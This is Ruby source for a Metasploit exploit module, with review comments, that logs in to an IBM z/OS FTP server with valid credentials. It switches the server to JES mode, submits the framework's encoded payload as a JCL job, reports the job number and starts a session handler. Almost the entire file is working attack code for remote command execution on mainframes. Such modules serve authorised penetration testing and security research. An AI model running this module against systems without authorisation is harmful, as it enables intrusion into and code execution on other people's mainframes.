##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
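# Metasploit module that logs in to an FTP server, switches the session to the
# JES interface with SITE FILE=JES and uploads the encoded payload as a JCL job.
#
# The module is post-authentication: it needs valid credentials on the target
# (see #post_auth? and the description). Its Notes declare ARTIFACTS_ON_DISK
# and IOC_IN_LOGS, i.e. a run is expected to leave traces on the target that
# log review can pick up.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the datastore options.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FTP JCL Execution',
        'Description' => %q{
          Submit JCL to z/OS via FTP and SITE FILE=JES.
          This exploit requires valid credentials on the target system.
        },
        'Author' => [
          'Bigendian Smalls',
          'mainframed a.k.a. soldier of fortran',
          'S&Oxballs a.k.a. chiefascot'
        ],
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'Platform' => ['mainframe'],
        'Privileged' => false,
        'Targets' => [['Automatic', {}]],
        'DisclosureDate' => '2013-05-12',
        'DisableNops' => true,
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    # NOTE(review): SLEEP is registered here but is not read anywhere in this
    # class - confirm whether another component consumes it.
    register_options(
      [
        Opt::RPORT(21),
        OptInt.new('SLEEP', [ false, 'Time to wait before checking if job has completed.', 5 ])
      ]
    )
  end

  # Marks the module as requiring authentication before it can do anything.
  #
  # @return [Boolean] always true
  def post_auth?
    true
  end

  # Logs in, probes SITE FILE=JES, then classifies the target from the cached
  # FTP banner and the reply to the probe.
  #
  # @return [CheckCode] Safe when the banner is not recognised, Vulnerable when
  #   the banner matches and the server answers "200 SITE", Detected otherwise
  def check
    ##
    # Connect to get the FTP banner and check target OS
    ##
    fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server") unless connect_login

    print_good('Successfully connected to FTP server.')
    test_jes = send_cmd(['site', 'file=jes'])

    # Disconnect and check cached self.banner
    disconnect

    # The banner is normalised to a String first: with a nil banner the
    # original code fell into the "not recognised" branch and then raised
    # NoMethodError on banner.strip instead of returning a CheckCode.
    server_banner = banner.to_s

    ##
    # Check if the target system has an FTP server running on z/OS
    ##
    unless server_banner =~ /IBM FTP CS V.R./
      return CheckCode::Safe("We could not recognize the server banner: #{server_banner.strip}")
    end

    if test_jes =~ /200 SITE/
      return CheckCode::Vulnerable('Found IBM z/OS Banner and JES commands accepted')
    end

    CheckCode::Detected('Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!')
  end

  ##
  # Exploit the target system by submitting a JCL job via FTP
  ##
  # Logs in, requests JES mode, uploads the encoded payload under a random
  # eight-letter upper-case name and reports the job number parsed from the
  # first line of the server's reply.
  #
  # @return [void]
  def exploit
    fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server") unless connect_login

    print_good('Successfully connected to FTP server.')

    # Only report success when the server actually confirmed the mode switch.
    # The run still continues on any other reply, matching the "Try anyway!"
    # stance of #check, but the operator log no longer claims a switch that
    # was never acknowledged.
    jes_reply = send_cmd(['site', 'file=jes'])
    if jes_reply =~ /200 SITE/
      print_good('Successfully switched to JES mode')
    else
      print_warning("Server did not confirm SITE FILE=JES: #{jes_reply.to_s.strip}")
    end

    jcl_file_name = Rex::Text.rand_text_alpha_upper(8)
    print_status("Uploading JCL file: #{jcl_file_name}")

    res = send_cmd_data(['put', jcl_file_name], payload.encoded)
    if res.nil?
      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to upload JCL to FTP server")
    end

    # An empty reply has no first line; to_s keeps the parse from raising
    # NoMethodError and leaves job_num nil instead.
    job_num = res.lines.first.to_s.split.last
    if job_num
      print_good("Job Submitted. Job number is #{job_num}")
    else
      print_warning('Upload reply did not contain a job number')
    end

    handler
    disconnect
  end
end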